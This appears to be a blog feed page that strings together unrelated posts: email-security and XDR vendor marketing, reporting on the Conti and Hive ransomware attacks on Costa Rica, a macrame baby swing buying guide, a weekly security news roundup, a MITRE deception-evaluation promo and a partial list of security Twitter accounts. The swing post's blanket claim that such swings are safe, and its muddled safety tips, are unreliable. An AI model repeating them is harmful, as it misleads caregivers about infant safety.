Email Security and XDR | Simple Integration, Powerful Results

/0 Comments/in /by

The State of Email Security

As tactics change, the sophistication of threat actors increases, and new vulnerabilities are constantly discovered, security operations teams are stretched to the limit investigating and remediating each incident. Email remains one of the most highly leveraged attack vectors. A staggering 79% of respondents to Mimecast’s State of Email Security 2022 study reported an increase in email volume at their organization, while 72% reported the number of email-based threats had risen during the past 12 months. Organizations today seek integrated defenses to protect email and improve incident response capabilities, while helping to reduce complexity, minimize risk, and decrease the demand on an already over-extended and under-staffed security team.

The State of Threat Intelligence

As email-based cyber attacks continue to rise, security teams are stretched and suffering from alert fatigue. They are still challenged by decision making and find themselves relying on limited data found during the investigation, accepting decisions will be made based on incomplete knowledge because they do not have time to investigate further.

Another common challenge: Security teams spend so much time gathering data that they do not have time to solve the problem. Organizations have to reduce complexity, minimize risk, and decrease the demand they put on already overtasked security teams. In the meantime, threats can move laterally throughout the organization before they are properly identified and remediated.

The Cybersecurity Skills Gap

And while the volume, intensity, and intelligence of cyberthreats increase, the world is simultaneously seeing a shortage of skilled cybersecurity talent that continues to widen. Tight job market or not, SOC analysts remain fatigued with the collection, normalization, and prioritization of data, unable to focus on cybersecurity incident response and resolution. Organizations face challenges hiring and retaining skilled security professionals. The deluge of alerts from security tooling and repetitive nature of the Tier 1 analyst position makes burnout one of the leading contributors to this shortage.

A New Solution Has Become Necessary

Security teams look to automation to help alleviate some of the repetitive tasks of incident response to focus their limited resources on the highest impact and most critical incidents, increasing throughput and reducing the time to respond. Integrating automation tools can help alleviate some of the alert and decision-making fatigue, data gathering woes, worker burnout, and pain caused by a lack of skilled workers, but we can leverage technoogy to do much more than that. As threats become more complex and organizations face worker shortages, a more advanced method of detection – XDR – has become necessary for most organizations.

What Is XDR, and Why Is It So Critical?

In an era where there are essentially no network perimeters, and disastrous breaches can come from anywhere at any time, security teams must sharpen their focus on threat detection and response.

In many organizations, earlier approaches such as first-generation security information and event management (SIEM) systems have proven unwieldy. They can be difficult to deploy and integrate, and are too costly and too susceptible to false positives. Linking SIEM to security orchestration and response (SOAR) systems has helped some organizations build response playbooks for automating responses to certain threats, but creating these has often been more complex and difficult than anticipated.

Cloud-native XDR solutions promise to overcome each of these problems, providing more focused and actionable data, better integration, more relevant insights, fewer false positives, and easier automation of responses. As XDRs move beyond endpoint-only EDR solutions, they promise to provide the fuller visibility and faster response that couldn’t be achieved with earlier tools.

Integrated Solutions Stop Threats

Strategic integrations lessen SOC teams’ pain by using automation between email and endpoint security solutions to prevent the lateral movement of threats throughout the organization.

Mimecast and SentinelOne provide an integrated solution that stops threats and streamlines response across the organization. Customers can be confident their devices will be protected from zero-day threats across each endpoint. By  correlating response between email and endpoint security solutions, analysts automate repetitive tasks for faster and more comprehensive incident response. When integrated, the two solutions deliver accelerated incident response and reduced mean time to response.

How the Mimecast and SentinelOne Integration Works

SentinelOne Singularity XDR provides AI-powered prevention, detection, and response across endpoints, cloud workloads, and IoT devices. When a threat is detected in SentinelOne, SentinelOne StorylineTM correlates detections and activity data across security layers, including email, endpoints, mobile, and cloud. Analysts can streamline the organization’s response by automatically suspending email for a given user, blocking the user email, or quarantining them. Upon detection of the threat, SentinelOne can automatically suspend the last logged-in user’s ability to send an email, helping secure a critical lateral movement path.

Sample Attack Timeline Without XDR Integration


Sample Attack Timeline With XDR Integration

Stopping Attacks Like LAPSUS$

Integrated solutions like the one from SentinelOne and Mimecast can stop prominent and damaging attacks like the recent LAPSUS$ attacks.

Threat actors such as LAPSUS$ take the time needed to research employees at a company they have decided to target. They first compromise the employee’s personal network and search for credentials that can be used to access corporate systems. This is particularly easy if the employee uses the same passwords for both their personal and private credentials. Even if the attacker does not find the credentials they are looking for, they can use the information they have already obtained to reset passwords and complete account recovery actions. Attackers like LAPSUS$ have even been known to call a company’s IT Helpdesk to attempt to get credentials reset.

The SentinelOne and Mimecast integration can stop attacks like LAPSUS$ by preventing them from moving laterally. The two solutions share information about threats that have been identified, reducing the likelihood that an attack will be successful. Security Awareness Training can also play an important part in thwarting attacks like LAPSUS$, giving employees an edge in identifying potential threats that can arrive in either their personal or work email.

The Bottom Line

Email security and XDR are the ideal pairing for security teams that are overtasked and struggling to keep up with alert volume and a never-ending stream of threats delivered via email. For more information about how your organization can benefit from this joint SentinelOne and Mimecast solution, read our joint solution brief.

Costa Rica May Be Pawn in Conti Ransomware Group’s Bid to Rebrand, Evade Sanctions

/0 Comments/in /by

Costa Rica’s national health service was hacked sometime earlier this morning by a Russian ransomware group known as Hive. The intrusion comes just weeks after Costa Rican President Rodrigo Chaves declared a state of emergency in response to a data ransom attack from a different Russian ransomware gang — Conti. Ransomware experts say there is good reason to believe the same cybercriminals are behind both attacks, and that Hive has been helping Conti rebrand and evade international sanctions targeting extortion payouts to cybercriminals operating in Russia.

The Costa Rican publication CRprensa.com reports that affected systems at the Costa Rican Social Security Fund (CCSS) were taken offline on the morning of May 31, but that the extent of the breach was still unclear. The CCSS is responsible for Costa Rica’s public health sector, and worker and employer contributions are mandated by law.

The fallout from this latest attack is not yet clear, but it is likely to be disruptive: A hand-written sign posted outside a public health center in Costa Rica today explained that all systems are down until further notice (thanks to @Xyb3rb3nd3r for sharing this photo).

A hand-written notice posted outside a public health clinic today in Costa Rica warned of system outages due to a cyberattack on the nation’s healthcare systems.

A copy of the ransom note left behind by the intruders and subsequently uploaded to Virustotal.com indicates the CCSS intrusion was the work of Hive, which typically demands payment for a digital key needed to unlock files and servers compromised by the group’s ransomware.

A HIVE ransomware chat page for a specific victim (redacted).

On May 8, President Chaves used his first day in office to declare a national state of emergency after the Conti ransomware group threatened to publish gigabytes of sensitive data stolen from Costa Rica’s Ministry of Finance and other government agencies. Conti initially demanded $10 million, and later doubled the amount when Costa Rica refused to pay. On May 20, Conti leaked more than 670 gigabytes of data taken from Costa Rican government servers.

As CyberScoop reported on May 17, Chaves told local media he believed that collaborators within Costa Rica were helping Conti extort the government. Chaves offered no information to support this claim, but the timeline of Conti’s descent on Costa Rica is worth examining.

Most of Conti’s public communications about the Costa Rica attack have very clearly assigned credit for the intrusion to an individual or group calling itself “unc1756.” In March 2022, a new user by the same name registered on the Russian language crime forum Exploit.

A message Conti posted to its dark web blog on May 20.

On the evening of April 18, Costa Rica’s Ministry of Finance disclosed the Conti intrusion via Twitter. Earlier that same day, the user unc1756 posted a help wanted ad on Exploit saying they were looking to buy access to “special networks” in Costa Rica.

“By special networks I mean something like Haciendas,” unc1756 wrote on Exploit. Costa Rica’s Ministry of Finance is known in Spanish as the “Ministerio Hacienda de Costa Rica.” Unc1756 said they would pay $USD 500 or more for such access, and would work only with Russian-speaking people.

THE NAME GAME DISTRACTION

Experts say there are clues to suggest Conti and Hive are working together in their attacks on Costa Rica, and that the intrusions are tied to a rebranding effort by Conti. Shortly after Russia invaded Ukraine at the end of February, Conti declared its full support, aligning itself directly with Russia and against anyone who would stand against the motherland.

Conti’s threatening message this week regarding international interference in Ukraine.

Conti quickly deleted the declaration from its website, but the damage had already been done, and any favor or esteem that Conti had earned among the Ukrainian cybercriminal underground effectively evaporated overnight.

Shortly thereafter, a Ukrainian security expert leaked many months worth of internal chat records between Conti personnel as they plotted and executed attacks against hundreds of victim organizations. Those candid messages exposed what it’s like to work for Conti, how they undermined the security of their targets, as well as how the group’s leaders strategized for the upper hand in ransom negotiations.

But Conti’s declaration of solidarity with the Kremlin also made it increasingly ineffective as an instrument of financial extortion. According to cyber intelligence firm ADVIntel, Conti’s alliance with the Russian state soon left it largely unable to receive ransom payments because victim companies are being advised that paying a Conti ransom demand could mean violating U.S. economic sanctions on Russia.

“Conti as a brand became associated with the Russian state — a state that is currently undergoing extreme sanctions,” ADVIntel wrote in a lengthy analysis (PDF). “In the eyes of the state, each ransom payment going to Conti may have potentially gone to an individual under sanction, turning simple data extortion into a violation of OFAC regulation and sanction policies against Russia.”

Conti is by far the most aggressive and profitable ransomware group in operation today. Image: Chainalysis

ADVIntel says it first learned of Conti’s intrusion into Costa Rican government systems on April 14, and that it has seen internal Conti communications indicating that getting paid in the Costa Rica attack was not the goal.

Rather, ADVIntel argues, Conti was simply using it as a way to appear publicly that it was still operating as the world’s most lucrative ransomware collective, when in reality the core Conti leadership was busy dismantling the crime group and folding themselves and top affiliates into other ransomware groups that are already on friendly terms with Conti.

“The only goal Conti had wanted to meet with this final attack was to use the platform as a tool of publicity, performing their own death and subsequent rebirth in the most plausible way it could have been conceived,” ADVIntel concluded.

ADVIntel says Conti’s leaders and core affiliates are dispersing to several Conti-loyal crime collectives that use either ransomware lockers or strictly engage in data theft for ransom, including AlphV/BlackCat, AvosLocker, BlackByte, HelloKitty, Hive, and Karakurt.

Still, Hive appears to be perhaps the biggest beneficiary of any attrition from Conti: Twice over the past week, both Conti and Hive and claimed responsibility for hacking the same companies. When the discrepancy was called out on Twitter, Hive updated its website to claim it was not affiliated with Conti.

Conti and Hive’s Costa Rican exploits mark the latest in a string of recent cyberattacks against government targets across Latin America. Around the same time it hacked Costa Rica in April, Conti announced it had hacked Peru’s National Directorate of Intelligence, threatening to publish sensitive stolen data if the government did not pay a ransom.

But Conti and Hive are not alone in targeting Latin American victims of late. According to data gathered from the victim shaming blogs maintained by multiple ransomware groups, over the past 90 days ransom actors have hacked and sought to extort 15 government agencies in Brazil, nine in Argentina, six in Columbia, four in Ecuador and three in Chile.

A recent report (PDF) by the Inter-American Development Bank suggests many Latin American countries lack the technical expertise or cybercrime laws to deal with today’s threats and threat actors.

“This study shows that the Latin American and Caribbean (LAC) region is not sufficiently prepared to handle cyberattacks,” the IADB document explains. “Only 7 of the 32 countries studied have a critical infrastructure protection plan, while 20 have established cybersecurity incident response teams, often called CERTs or CSIRTs. This limits their ability to identify and respond to attacks.”

Macrame Baby Swing – A Boho-Inspired Addition To Your Child’s Room

/0 Comments/in /by

Are you looking for a fun, boho-inspired addition to your child’s room? Then macrame baby swing is a must-have. It’s perfect for those lazy summer days when you want to relax and watch your little one play.

Macrame baby swings are becoming increasingly popular, and it’s no wonder why. They add a touch of whimsy and charm to any room. Macrame baby swings are similar to hammocks, but they’re smaller and have a more delicate design.

Whether you want to buy a macrame baby swing or do it yourself, we’ve got you covered. This article will show you how to make your own macrame baby swing and where to buy one if you’re not up for the DIY challenge.

What Is Macrame?

Macrame is a form of textile-making that uses knotting techniques to create intricate patterns. It first became popular in the 1970s but has seen a resurgence in recent years due to the bohemian/boho-chic trend.

While macrame can be used to create a wide variety of items, It’s often used to make wall hangings, plant hangers, and other home decor items.

Is A Macrame Baby Swing Safe?

Yes, macrame baby swings are safe. They’re made out of lightweight materials and have sturdy construction. However, it’s important to make sure that the swing is hung securely and that there’s nothing nearby that your child could bump into while playing.

A lot of time macrame baby swings come with wooden elements like a bar or hoop. These can add extra stability and security to the swing.

Where To Put The Macrame Baby Swing?

Macrame baby swings can be hung indoors or outdoors. They look great in a child’s bedroom, playroom, or even living room. If you’re planning on using it outdoors, choose a shady spot out of the way of any potential hazards.

As with any piece of baby gear, there are some safety considerations to keep in mind when using a macrame baby swing.

  1. Always use the swing indoors or in a shady, well-ventilated area outdoors. The swing should never be left in direct sunlight.
  2. Make sure the swing is on a level surface before letting your child use it. The last thing you want is for the swing to tip over while your child is in it.
  3. Never leave your child unattended in the swing. Always stay within arms’ reach if your child needs help getting out or falls asleep in the swing.
  4. Inspect the swing regularly for any signs of wear and tear. If you see any fraying or damage to the rope, discontinue the use of the swing and replace the damaged parts.

By following these simple safety tips, you can ensure your child has a safe and enjoyable experience in their macrame baby swing.

Best Ready-To-Buy Macrame Baby Swings

If you’re not up for the challenge of making your own macrame baby swing, then there are plenty of options available to purchase. Here are some of our favorites!

S.N.HANDICRAFTS Handmade Macrame Baby Swing

This macrame baby swing is handmade in India using 100% cotton rope. It’s durable and perfect for indoor or outdoor use. Perfect for toddlers up to 50 lbs.

Mass Lumber Macrame Baby Swing Outdoor Seat with Belt

This macrame baby swing is made out of durable materials. It has a safety belt to keep your child secure and can hold up to 110 lbs. Perfect for use outdoors.

NA Wooden Macrame Baby Swing

A high-quality, handmade cotton Macrame baby swing composed of solid wood and knitted by hand, offering excellent safety and quality. The baby swing includes a 39-inch chain and a non-slip children’s seat cushion, which is both comfortable and supportive for your little one.

The swing may be raised or lowered as required to ensure that the infant is more comfortable. The swing can bear up to 80 pounds, and it is designed for children aged 1-5.

Bean Sprout Baby Collection – Baby Hammock Swing Chair

The Bean Sprout Baby Hammock Swing Chair is the perfect place for your little one to relax. It is a premium quality macrame baby swing made of 100% cotton. It is soft, comfortable, and safe for your baby.

Choosing A Macrame Baby Swing

When choosing a macrame baby swing, there are a few things to keep in mind. First, consider the size of the swing. It should be big enough for your baby to comfortably sit or lie down in but not so large that it takes up too much space in the room.

Second, think about the design. There are many different macrame patterns to choose from. Some are more intricate than others. Consider the overall style of your home and choose a swing that fits in with the rest of your decor.

Last, think about functionality. Some swings come with additional features like a wooden bar or hoop. These can add stability and security to the swing. Others come with removable cushions for added comfort. Choose the features that are most important to you and your family.

How To Make Macrame Baby Swing Yourself

Making your own macrame baby swing is excellent if you’re feeling crafty and up for the challenge. You will save money, but you’ll also get to choose the perfect design and color scheme for your home.

The Internet is full of different tutorials on making a macrame baby swing. We recommend you check out this step-by-step guide:

What Do You Need To Make A Macrame Baby Swing?

  • Macrame cord
  • Wooden dowel or hoop
  • Wooden base
  • Scissors
  • Tape measure
  • Pencil or pen
  • Paper clips

Choosing the suitable macrame cord/rope is crucial in making your own macrame baby swing. The cord should be strong enough to support your child’s weight but also soft and comfortable to the touch.

We recommend using a 3/8-inch (9mm) cotton rope. This size is strong enough to support most babies and toddlers, but it’s also soft and gentle on the skin.

Other popular macrame cords are made of jute or hemp. These materials are also strong and durable, but they’re not as soft as cotton. If you choose to use one of these materials, add a cushion or padding to the swing, so your child is comfortable.

Macrame Cords on Amazon

When searching for a macrame baby swing pattern or tutorial, double-check a list of supplies needed. Some designs call for special tools or equipment that you may not have around the house.

We also recommend reading through the entire pattern before starting. This will help you understand the steps involved and ensure you have everything you need.

How Much Macrame Cord Do I Need For A Swing?

The amount of cord you need will depend on the size of the swing and the design you choose.
Most macrame baby swing patterns call for between 50 and 100 feet (15 to 30 meters) of macrame cord.

We recommend purchasing at least 200 feet (60 meters) of cord to be safe. This will give you enough to make a baby swing and allow some mistakes along the way. You can always use the extra cord for another project or donate it to a local craft store.

What Size Rope Is Best For A Baby Swing?

The most popular macrame cord size for a baby swing is 3/8-inch (9mm). This size is strong enough to support most babies and toddlers, but it can vary depending on a particular project.

Why Make A Macrame Baby Swing?

A macrame baby swing is a beautiful and unique addition to your child’s nursery or playroom. Not only is it eye-catching, but it’s also sturdy and functional.

As your child grows, they’ll be able to enjoy the swing as a fun place to play or relax. And when they’re no longer using it, you can easily repurpose it into a wall hanging or other home decor item.

If you decide to make a macrame baby swing yourself, it’s a great way to add a personal touch to your child’s room. Plus, there is something very satisfying about creating something beautiful with your own two hands. Your baby will be able to enjoy the swing for years to come, and it will always hold sentimental value.

The post Macrame Baby Swing – A Boho-Inspired Addition To Your Child’s Room appeared first on Comfy Bummy.

The Good, The Bad and the Ugly in Cybersecurity – Week 22

/0 Comments/in /by

The Good

Nigerian authorities have arrested a 37-year-old man alleged to be the leader of the SilverTerrier (Team TMT) business email compromise gang.

Interpol announced the arrest on Wednesday, and detailed how Interpol’s Africa Desk, AFJOC (African Joint Operation against Cybercrime), Nigerian law enforcement, and other private sector partners successfully tracked and apprehended the suspect.

According to the statement, Operation Delilah began in May 2021, led by Nigerian police with three Interpol partners offering intelligence to the AFJOC.

Public and industrial analysts from Interpol’s Cyber Fusion Centre enriched the intelligence before referring it to the Nigerian police. Australian, Canadian and American law enforcement also supported the investigation by participating in several case-coordinating meetings.

With support from a private sector firm, investigators mapped out and tracked the suspect’s online activities and physical travel before police made the arrest at Murtala Mohammed International Airport in Lagos.

In their statements, Interpol officials expressed their hope that the operation would “stand as a reminder to cyber criminals across the world that law enforcement will continue to pursue them, and that this arrest will bring comfort to victims of the suspect’s alleged campaigns.”

This operation offers encouraging signs that governments and law enforcement officials across the world are taking notice of escalating cyber crime and proactively taking action to investigate and neutralize major threats. While the road ahead is a long one, the international investment displayed here, and the cooperation of major vendors in the private sector, is a great first step towards a safer cybersecurity landscape.

The Bad

This week, details emerged of an attack chain against Zoom clients that potentially left all Zoom users exposed to a zero-click vulnerability. Several bugs were discovered by a security researcher in February and Zoom released a patch in late April. All Zoom users are urged to ensure they update to version 5.10.0 if they have not already done so.

According to Zoom’s advisory, CVE-2022-22784 could allow an attacker to break out of the current XMPP message context and force a user’s client to perform a variety of malicious actions.

The same researcher also identified CVE-2022-22785, a vulnerability that allows threat actors to send user session cookies to a domain outside of Zoom, which leaves users open to spoofing attacks, and CVE-2022-22786, which allows an attacker to trick a user into downgrading their Zoom client to a less secure version.

Chaining the vulnerabilities together could allow an attacker to achieve remote code execution (RCE) without any user interaction.

zoom zero click vulnerability

Explaining the attack chain, Ivan Fratric, the Google Project Zero researcher responsible for discovering the bugs, said “The only ability an attacker needs is to be able to send messages to the victim over Zoom chat over XMPP protocol”.

He went on to explain that a threat actor could trick a targeted Zoom client into connecting into a man-in-the-middle server that downgrades a target’s Zoom client to a version from 2019.

These RCE attacks are possible because Zoom’s clients and servers use different XML parsing libraries, which means they also parse XMPP messages differently.

Although Zoom patched its servers against these vulnerabilities when they were first discovered in February, the client patch was only recently released. Zoom users that haven’t updated yet should patch their clients immediately to mitigate the risk.

The Ugly

HP’s security researchers are observing a malware campaign that leverages malicious PDFs to target Window PCs with malware through a code-execution vulnerability in MS Office that was discovered four years ago.

According to HP’s threat intelligence, threat actors trick targets into opening malicious emails and a PDF document labelled as a remittance invoice. Once the victim opens the document, the PDF file will load a fake Adobe Reader prompt designed to look legitimate and prompt users to open a malicious Word document.

pdf phishing malware

Ultimately, this attack chain is designed to deliver an executable from the Snake keylogger family, which steals information from targeted users.

While malicious PDFs are hardly new, in recent years cyber criminals have primarily exploited Word documents or Excel sheets to infect machines with malware. However, researchers believe that the PDF format’s relative scarcity in today’s threat landscape is not only due to widespread awareness of Microsoft Office files but also to the belief that other document formats serve as better social engineering lures.

The existence of malicious documents like these is truly disruptive to vulnerable users and reminds us that not every emerging threat is cutting edge—older threats can still wreak just as serious damage.

SentinelOne Debuts at the Top of MITRE Engenuity ATT&CK® Deception Evaluation. See Why.

/0 Comments/in /by

Released May 25, 2022, MITRE Engenuity ATT&CK® Evaluation Trials – Deception is an inaugural evaluation that expands the ATT&CK Evaluations landscape to evaluate vendors on their deception capabilities. The evaluation can dramatically increase analyst confidence in detection via high fidelity tripwires, causing the adversary to waste time, money, or capability, and potentially provide vendors critical new insights into adversary behavior.

What Did the ATT&CK Deception Evaluation Consist Of?

For this evaluation, MITRE chose to emulate APT29 threat group. APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008. This group reportedly compromised the Democratic National Committee starting in the summer of 2015. The evaluation seeks to answer two questions:

  1. Did the adversary encounter the deception ? (Observe)
  2. Did the adversary engage in the deception? (Engage)
  • Observe: Determining whether the adversary encountered deception is pretty straightforward. The evaluation can determine by running the adversary technique and recording whether it sees something different from a scenario that did not deploy deception. For the Observe portion of the evaluation, the MITRE Engenuity team did not interact with the Deception.
  • Engage: In order to fully capture the value of the vendor participants’ products, the MITRE Engenuity team executed a modified scripted plan that allowed deeper interaction with the deceptions. In the Engage portion of the Evaluation, the red team would go off-script and interact with deception if it was present. When the red team engaged, they would exhaust all interactions before going back to the script.

How Did SentinelOne Perform on the ATT&CK Deception Evaluation?

As evidenced from the results of all four years of the ATT&CK Enterprise Evaluations, SentinelOne Singularity XDR platform already excels at visibility and detection. With SentinelOne’s Hologram deception solution tested in this evaluation, SentinelOne also protects the enterprise against sophisticated Identity-based attacks.

According to MITRE Engenuity’s published results, SentinelOne observed and/or engaged with most detections, identifying 17 unique techniques, including 11 techniques that targeted identities specifically. SentinelOne’s Singularity XDR platform – and specifically its Hologram deception technology – was recognized for its ability to:

  1. Deliver Real-time Protection Against Active Directory (AD) Compromise.
    A security compromise of AD can essentially undermine the integrity of the entire enterprise enabling adversaries to steal credentials and gain access to critical systems.

    SentinelOne protects AD privileged credentials from theft by hiding them from attackers and replacing them with decoys. During the MITRE Deception evaluation, when the MITRE red team tried to get access to the system to get account information and credentials (T1033 T1082 T1087), the solution returned decoy credentials to them every time.
    Console output showing the attempted credential enumeration

    This enables the security team to protect in real-time against advanced attacks targeting Active Directory.

  2. Mislead Attackers To Protect Critical Assets With Data Cloaking.

    Attackers steal and destroy information as part of their attacks, whether they seek to move deeper into the network or hold data for ransom. Preventing them from seeing or accessing local file and account information can prevent lateral movement, discovery, and data theft or destruction.

    SentinelOne steers adversaries away by misdirection, showing decoys indistinguishable from production assets. During the MITRE Deception evaluation, when the red team tried to monitor system activity and queried for the computer name, SentinelOne reported decoy hostname “Newburgh” instead of the actual hostname “Utica” (T1082). When the red team tried to manipulate the software and engage with the file by browsing to it, SentinelOne hid the file from the directory listing (T1560).

    Console output showing the attempted discovery activities

    By preventing attackers from seeing or exploiting critical data, organizations can disrupt discovery or lateral movement activities and limit the damage from ransomware attacks.

  3. Stop Lateral Movement and Privilege Escalation By Preventing Pass-The-Ticket Attacks.

    Pass-The-Ticket attacks, such as a Golden Ticket attack or a Silver Ticket Attack, are powerful techniques adversaries employ for post-exploitation lateral movements and privilege escalation. Using these techniques, attackers can gain unlimited access to any endpoint on the network or service, potentially causing catastrophic consequences.

    During the MITRE Deception Evaluation, when the red team created a ticket, the terminal output of klist reported no cached tickets. SentinelOne detected a Kerberos attack, and hid the contents of the klist command from the output (T1550).
    Console output showing the Pass-the-Ticket attack attempt

    SentinelOne denies the red team from using the Golden Ticket, even though Mimikatz generated and loaded it successfully. SentinelOne detects forged Kerberos Golden and Silver tickets and prevents lateral movement and privilege escalation when the red team uses the forged Kerberos tickets.

  4. Maximize Security Insight Into the Adversary Behavior.
    SentinelOne’s deception technology not only serves to detect and respond to active attackers in a customer environment but also to inform and strengthen security programs in the longer term. By misdirecting attacks using SentinelOne, defenders can gain ingestible, actionable TTP information and high-confidence, substantiated attack forensics that can support investigations and develop threat intelligence. SentinelOne even lets you visualize attacks, see how they progressed over time, and map their associated events to the MITRE ATT&CK D3FEND™ matrix.

Mapping to MITRE Engage Matrix

The MITRE Engage Matrix is a framework for planning and discussing adversary engagement operations that empower organizations to engage their adversaries and achieve their cybersecurity goals. MITRE Engage seeks to help defenders by lowering the barrier to entry while raising the ceiling of expertise to use adversary engagement technologies. SentinelOne provides the most extensive capabilities to implement the activities outlined in the Engage Matrix, covering 38 of the 41 areas in the Operations phase.

Why SentinelOne? Why Should It Matter To You?

Top Coverage for Both Enterprise ATT&CK + Deception ATT&CK Frameworks

As a leader across MITRE Enterprise ATT&CK Evaluations for the third consecutive year and a leader in the inaugural MITRE ATT&CK Deception Evaluation Trial, SentinelOne once again demonstrate its commitment to push the boundaries to help enterprises gain control of their dynamic attack surface.

As the first and only XDR vendor to participate and lead the ATT&CK Deception Evaluation, Singularity XDR platform demonstrates the most powerful, autonomous XDR platform, reducing the enterprise attack surface across human, device, and cloud attack surfaces. The solution provides an effective combination of prevention, protection, detection, and deception capabilities to stop attackers early whether they are attempting to establish a beachhead inside the network or compromising identity data to move laterally, escalate privileges, and acquire targets.

SentinelOne is an enthusiastic supporter of what MITRE does, bringing transparent and open evaluation methodologies to the security industry and participating in all the evaluations has become an essential practice that we have used to improve our products further.

To learn more about SentinelOne’s results on the ATT&CK® Deception Evaluations, visit https://www.sentinelone.com/lp/mitre-deception/

To learn more about SentinelOne’s results on the fourth round of ATT&CK® Enterprise Evaluations, visit: https://www.sentinelone.com/lp/mitre/.

The Leader in MITRE Deception Evaluation
SentinelOne is the first and only XDR vendor to lead the MITRE Engenuity ATT&CK® Deception Evaluation

LEARN MORE

22 Cybersecurity Twitter Accounts You Should Follow in 2022

/0 Comments/in /by

As we navigate towards the midway-point of 2022, and despite current uncertainty over the company’s ownership, there is no doubt that Twitter remains cybersecurity’s favorite social media sharing platform. Whether you’re looking for the latest news on ransomware attacks and cybercrime, APTs and cyber war, digital forensics and incident response, malware outbreaks or reverse engineering, Twitter has it all and more.

Infosec is all about sharing knowledge, and on Twitter you’ll find our industry’s finest and brightest doing just that. So who should you be following in 2022 to stay up with current events, expand your knowledge and learn about new skills and resources? We’ve hand-picked 22 essential cybersecurity accounts for you to follow in 2022. While some you will find on our lists from previous years, there’s plenty of new, interesting and influential tweeters to discover on this year’s roster, too. Let’s check it out!

1. @KimZetter | Kim Zetter

Kim Zetter is a San Francisco-based journalist who has been writing about cybersecurity, national security and election security for over a decade. Author of a bestselling and authoritative book on Stuxnet, @KimZetter is an account where you will find the best in cybersecurity-related journalism.

2. @maddiestone | Maddie Stone

Reverse engineer and zero-day exploit expert, Maddie Stone works as a security researcher at Google Project Zero and is a regular con speaker. Her twitter account @maddiestone is essential for anyone wanting to keep up with the latest bugs and zero-day discoveries.

3. @cyb3rops | Florian Roth

Florian Roth is a detection engineer who is probably best known for his YARA and IOC THOR APT scanner. Florian also has a vast collection of free tools and detection utilities available on github. Florian’s feed @cyb3rops contains an unmissable mix of original and curated content focusing on the latest threats and threat detection.

4. @campuscodi | Catalin Cimpanu

Catalin has featured on our list in the past, and even though he now describes himself as an “Ex-cybersecurity reporter” after having moved to work on newsletters for podcasting outlet RiskyBiz, his Twitter feed @campuscodi is still a goldmine of curated cybersecurity news and intel that’s not to be missed.

5. @cglyer | Christopher Glyer

Christopher is a Microsoft Threat Intelligence Center crimeware researcher, former incident responder and security architect. Follow @cglyer to stay on top of the latest malware outbreaks and developing news around ransomware and cybercrime.

6. @billyleonard | billy leonard

Billy Leonard is Global Head of Analysis of State Sponsored Hacking and Threats at Google Threat Analysis Group (TAG). While that sure is a lot of nouns, it all translates into a Twitter account worth following if you are interested in shares of IoCs and other valuable info pertaining to the latest threat actor activity.

7. @Kostastsale | Kostas

Speaking of detections, DFIRReport analyst @Kostastsale is a must-follow for anyone wanting to stay ahead of recent threat reports, detection tips and other DFIR related news. Kostas also has a collection of useful repos on Github covering YARA rules, MITRE ATT&CK navigator and Threat Intelligence playbooks.

8. @vxunderground | vx-underground

A relatively new infosec account on Twitter, vx-underground has quickly amassed a large following of cybersecurity professionals due to a combination of entertaining yet informative tweets with breaking news and access for researchers to the latest malware samples. Malware hunters, reverse engineers and detection engineers alike will find @vxunderground a valuable addition to their daily digest.

9. @likethecoins | Katie Nickels

Katie is Director of Intel at RedCanary, as well as a SANS Certified Instructor for FOR578: Cyber Threat Intelligence, and Senior Fellow at the Atlantic Council’s Cyber Statecraft Initiative. Katie does great work in promoting the work of others and is a great source of information for those making their way in the infosec industry, follow her at @likethecoins.

10. @RidT | Thomas Rid

Professor of Strategic Studies and founding director of the Alperovitch Institute for Cybersecurity Studies at Johns Hopkins University’s School of Advanced International Studies, Thomas is one of the world’s foremost experts on politcally motivated cyber attacks, disinformation and cybernetics. @RidT is an essential follow for all those interested in the juncture between cyber, politics and information.

11. @theJoshMeister | Josh Long

Josh Long has been on Twitter in the macOS/OSX security space longer than pretty much anyone else, and his following of almost 130K is testament to that. As a journalist specializing in cybersecurity issues relating to Apple, Mac and digital privacy, @theJoshMeister is a must-follow for all things related to security and the Cupertino giant.

12. @ryanaraine | Ryan Naraine

Another veteran of last year’s list, @ryanaraine remains an essential account to follow if you are interested in hackers and the business of cybersecurity. Ryan not only retweets the best of cybersecurity and infosec news from around the Twittersphere, he also offers thoughtful and insightful observations through regular podcasts.

13. @craiu | Costin Raiu

Costin Raiu is one of those infosec people from whom there is always something to learn, and if you’re not following @craiu yet, then now is the time to become one of his 37K followers! The self-described “antihacker from another planet” is director of Global Research and Analysis at Kaspersky and serves as a superb source of all things cybersecurity.

14. @AricToler | Aric Toler

Aric Toler is Director of Training & Research at Bellingcat, where he initially began as a volunteer way back in 2014. Bellingcat is a Netherlands-based investigative journalism charity specializing in OSINT, and Aric’s Twitter account is a great place to keep up with both his and their essential output.

15. @evacide | Eva Galperin

Eva Galperin is EFF‘s Director of Cybersecurity and co-founder of The Coalition Against Stalkerware. Always relevant and often humorous, @evacide is an infosec account not to be missed for all things related to digital privacy.

16. @4n6lady | Shannon Brazil

Shannon is Associate Director at Arete Incident Response and an OSINT enthusiast. Her twitter feed is followed by 35,000 others for its engaging mix of personal and techy content with an emphasis on DFIR.

17. @zackwhittaker | Zack Whittaker

As security editor at TechCrunch and author of the popular this.weekinsecurity newsletter, Zack is one of the first sources to look to for breaking cyber and infosec news. @zackwhittaker’s feed is a fantastic way to keep up with everything that’s going on in the cyber world that could affect your organization, whether it’s in the U.S. or abroad.

18. paπcake | @trufae

OK, let’s talk about reverse engineering, starting off with the underrated but hugely capable radare2 software, developed and maintained by paπcake, whose feed is worth following not only for news and updates regarding r2 and @radareorg, but for reverse engineering in general.

19. @Fox0x01 Azeria |  Maria Markstedter

ARM is becoming increasingly important for reverse engineers due its overwhelming use in Linux, iOS and now Apple’s M1 Macs. One of the best resources on the net for knowledge around ARM is Azeria Labs, aka Maria Markstedter. @Fox0x01 is an expert in ARM-based systems and is a thought leader in cybersecurity.

20. @HostileSpectrum | HostileSpectrum

Current events as they are, many of us in cybersecurity and elsewhere are taking a keen interest in the situation in Ukraine, how it’s developing, and what the wider lessons and ramifications might be. Follow @HostileSpectrum for great commentary on cyber war and the situation in Ukraine.

21. @GossiTheDog | Kevin Beaumont

Hugely popular and tells-it-like-it-is cybersecurity writer Kevin Beaumont says he keeps his employer’s identity secret to spare them the complaints from irate organizations. For the rest of us, @GossiTheDog is often the first to break news and always has insightful takes worth reading.

22. @juanandres_gs | J. A. Guerrero-Saade

